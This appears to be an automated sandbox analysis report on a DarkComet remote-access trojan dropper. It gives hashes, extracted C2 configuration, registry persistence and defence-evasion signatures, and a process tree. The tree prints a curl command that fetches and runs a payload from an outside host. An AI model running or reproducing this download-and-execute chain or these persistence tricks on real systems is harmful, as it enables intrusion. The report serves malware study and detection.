Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 19:53
Static task
static1
Behavioral task
behavioral1
Sample
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
Resource
win10v2004-20241007-en
General
-
Target
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
-
Size
5.3MB
-
MD5
37bc24bd5ce2067bdb0c34c0ca414c00
-
SHA1
3d7b67e7370d79533cb984330f21e5f5c5b9479a
-
SHA256
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185d
-
SHA512
bf4fe4f5139bd206792b645509aaf42be2d58d3f003a497c799bbd3d860ec5c9193f781e4d1525ddd9f7798f8395d21e96ed74ceeb52c0ab43df3d642758ad8a
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD:hrj30qkXnsr2YIIog7if+HJF
Malware Config
Extracted
darkcomet
GoogleDebugger
147.185.221.24:14161
RO_MUTEX-8HU43EZ
-
InstallPath
ChromeCookies\ChromeCookie.exe
-
gencode
WN0BLB8aPxBw
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
GoogleDebugJ
Signatures
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe,C:\\Windows\\TEMP\\ChromeCookies\\ChromeCookie.exe" IntelGpuUpdater.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2468 attrib.exe 1468 attrib.exe 2452 attrib.exe 1644 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 12 IoCs
pid Process 2904 test.exe 3424 ChromeCookie.exe 4040 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2288 IntelGpuUpdater.exe 3464 ChromeCookie.exe 2972 IntelGpuUpdater.exe 3408 IntelGpuUpdater.exe 2212 IntelGpuUpdater.exe 3924 IntelGpuUpdater.exe 1468 IntelGpuUpdater.exe 3128 IntelGpuUpdater.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" ChromeCookie.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleDebugJ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ChromeCookies\\ChromeCookie.exe" iexplore.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3424 set thread context of 2968 3424 ChromeCookie.exe 98 PID 3464 set thread context of 4700 3464 ChromeCookie.exe 123 -
resource yara_rule behavioral2/files/0x000b000000023b70-8.dat upx behavioral2/memory/2904-10-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2968-46-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3424-48-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2904-50-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2288-61-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3464-97-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2288-98-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2972-100-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3408-102-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2212-105-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3924-108-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1468-110-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/3128-112-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe File created C:\Windows\IntelGpuUpdaterHelper.exe cmd.exe File opened for modification C:\Windows\IntelGpuUpdater.exe attrib.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3756 sc.exe 2892 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdaterHelper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChromeCookie.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IntelGpuUpdater.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3680 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000292154428646db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\DC3_FEXEC IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System iexplore.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fReverse = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion ChromeCookie.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000292154428646db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft iexplore.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000292154428646db01 IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000458356428646db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ChromeCookie.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Notepad\fWindowsOnlyEOL = "0" notepad.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" IntelGpuUpdater.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000e85f4f428646db01 IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Key created \REGISTRY\USER\.DEFAULT\Software IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" IntelGpuUpdater.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ test.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe 2132 IntelGpuUpdaterHelper.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2904 test.exe Token: SeSecurityPrivilege 2904 test.exe Token: SeTakeOwnershipPrivilege 2904 test.exe Token: SeLoadDriverPrivilege 2904 test.exe Token: SeSystemProfilePrivilege 2904 test.exe Token: SeSystemtimePrivilege 2904 test.exe Token: SeProfSingleProcessPrivilege 2904 test.exe Token: SeIncBasePriorityPrivilege 2904 test.exe Token: SeCreatePagefilePrivilege 2904 test.exe Token: SeBackupPrivilege 2904 test.exe Token: SeRestorePrivilege 2904 test.exe Token: SeShutdownPrivilege 2904 test.exe Token: SeDebugPrivilege 2904 test.exe Token: SeSystemEnvironmentPrivilege 2904 test.exe Token: SeChangeNotifyPrivilege 2904 test.exe Token: SeRemoteShutdownPrivilege 2904 test.exe Token: SeUndockPrivilege 2904 test.exe Token: SeManageVolumePrivilege 2904 test.exe Token: SeImpersonatePrivilege 2904 test.exe Token: SeCreateGlobalPrivilege 2904 test.exe Token: 33 2904 test.exe Token: 34 2904 test.exe Token: 35 2904 test.exe Token: 36 2904 test.exe Token: SeIncreaseQuotaPrivilege 3424 ChromeCookie.exe Token: SeSecurityPrivilege 3424 ChromeCookie.exe Token: SeTakeOwnershipPrivilege 3424 ChromeCookie.exe Token: SeLoadDriverPrivilege 3424 ChromeCookie.exe Token: SeSystemProfilePrivilege 3424 ChromeCookie.exe Token: SeSystemtimePrivilege 3424 ChromeCookie.exe Token: SeProfSingleProcessPrivilege 3424 ChromeCookie.exe Token: SeIncBasePriorityPrivilege 3424 ChromeCookie.exe Token: SeCreatePagefilePrivilege 3424 ChromeCookie.exe Token: SeBackupPrivilege 3424 ChromeCookie.exe Token: SeRestorePrivilege 3424 ChromeCookie.exe Token: SeShutdownPrivilege 3424 ChromeCookie.exe Token: SeDebugPrivilege 3424 ChromeCookie.exe Token: SeSystemEnvironmentPrivilege 3424 ChromeCookie.exe Token: SeChangeNotifyPrivilege 3424 ChromeCookie.exe Token: SeRemoteShutdownPrivilege 3424 ChromeCookie.exe Token: SeUndockPrivilege 3424 ChromeCookie.exe Token: SeManageVolumePrivilege 3424 ChromeCookie.exe Token: SeImpersonatePrivilege 3424 ChromeCookie.exe Token: SeCreateGlobalPrivilege 3424 ChromeCookie.exe Token: 33 3424 ChromeCookie.exe Token: 34 3424 ChromeCookie.exe Token: 35 3424 ChromeCookie.exe Token: 36 3424 ChromeCookie.exe Token: SeIncreaseQuotaPrivilege 2968 iexplore.exe Token: SeSecurityPrivilege 2968 iexplore.exe Token: SeTakeOwnershipPrivilege 2968 iexplore.exe Token: SeLoadDriverPrivilege 2968 iexplore.exe Token: SeSystemProfilePrivilege 2968 iexplore.exe Token: SeSystemtimePrivilege 2968 iexplore.exe Token: SeProfSingleProcessPrivilege 2968 iexplore.exe Token: SeIncBasePriorityPrivilege 2968 iexplore.exe Token: SeCreatePagefilePrivilege 2968 iexplore.exe Token: SeBackupPrivilege 2968 iexplore.exe Token: SeRestorePrivilege 2968 iexplore.exe Token: SeShutdownPrivilege 2968 iexplore.exe Token: SeDebugPrivilege 2968 iexplore.exe Token: SeSystemEnvironmentPrivilege 2968 iexplore.exe Token: SeChangeNotifyPrivilege 2968 iexplore.exe Token: SeRemoteShutdownPrivilege 2968 iexplore.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2968 iexplore.exe 4700 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4808 wrote to memory of 3500 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 84 PID 4808 wrote to memory of 3500 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 84 PID 4808 wrote to memory of 3500 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 84 PID 3500 wrote to memory of 4408 3500 cmd.exe 85 PID 3500 wrote to memory of 4408 3500 cmd.exe 85 PID 3500 wrote to memory of 4408 3500 cmd.exe 85 PID 4808 wrote to memory of 3052 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 86 PID 4808 wrote to memory of 3052 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 86 PID 4808 wrote to memory of 3052 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 86 PID 3052 wrote to memory of 4916 3052 cmd.exe 87 PID 3052 wrote to memory of 4916 3052 cmd.exe 87 PID 3052 wrote to memory of 4916 3052 cmd.exe 87 PID 4916 wrote to memory of 4300 4916 cmd.exe 88 PID 4916 wrote to memory of 4300 4916 cmd.exe 88 PID 4916 wrote to memory of 4300 4916 cmd.exe 88 PID 4916 wrote to memory of 2904 4916 cmd.exe 89 PID 4916 wrote to memory of 2904 4916 cmd.exe 89 PID 4916 wrote to memory of 2904 4916 cmd.exe 89 PID 4916 wrote to memory of 3680 4916 cmd.exe 90 PID 4916 wrote to memory of 3680 4916 cmd.exe 90 PID 4916 wrote to memory of 3680 4916 cmd.exe 90 PID 2904 wrote to memory of 3256 2904 test.exe 91 PID 2904 wrote to memory of 3256 2904 test.exe 91 PID 2904 wrote to memory of 3256 2904 test.exe 91 PID 2904 wrote to memory of 4492 2904 test.exe 93 PID 2904 wrote to memory of 4492 2904 test.exe 93 PID 2904 wrote to memory of 4492 2904 test.exe 93 PID 3256 wrote to memory of 1644 3256 cmd.exe 95 PID 3256 wrote to memory of 1644 3256 cmd.exe 95 PID 3256 wrote to memory of 1644 3256 cmd.exe 95 PID 4492 wrote to memory of 2468 4492 cmd.exe 96 PID 4492 wrote to memory of 2468 4492 cmd.exe 96 PID 4492 wrote to memory of 2468 4492 cmd.exe 96 PID 2904 wrote to memory of 3424 2904 test.exe 97 PID 2904 wrote to memory of 3424 2904 test.exe 97 PID 2904 wrote to memory of 3424 2904 test.exe 97 PID 3424 wrote to memory of 2968 3424 ChromeCookie.exe 98 PID 3424 wrote to memory of 2968 3424 ChromeCookie.exe 98 PID 3424 wrote to memory of 2968 3424 ChromeCookie.exe 98 PID 3424 wrote to memory of 2968 3424 ChromeCookie.exe 98 PID 3424 wrote to memory of 2968 3424 ChromeCookie.exe 98 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 2968 wrote to memory of 1616 2968 iexplore.exe 99 PID 4808 wrote to memory of 1720 4808 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 101 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 1644 attrib.exe 2468 attrib.exe 1468 attrib.exe 2452 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe"C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\curl.execurl https://dontuseme.ct8.pl/test.exe4⤵
- System Location Discovery: System Language Discovery
PID:4300
-
-
C:\Users\Admin\AppData\Local\test.exeC:\Users\Admin\AppData\Local\test.exe4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\test.exe" +s +h5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
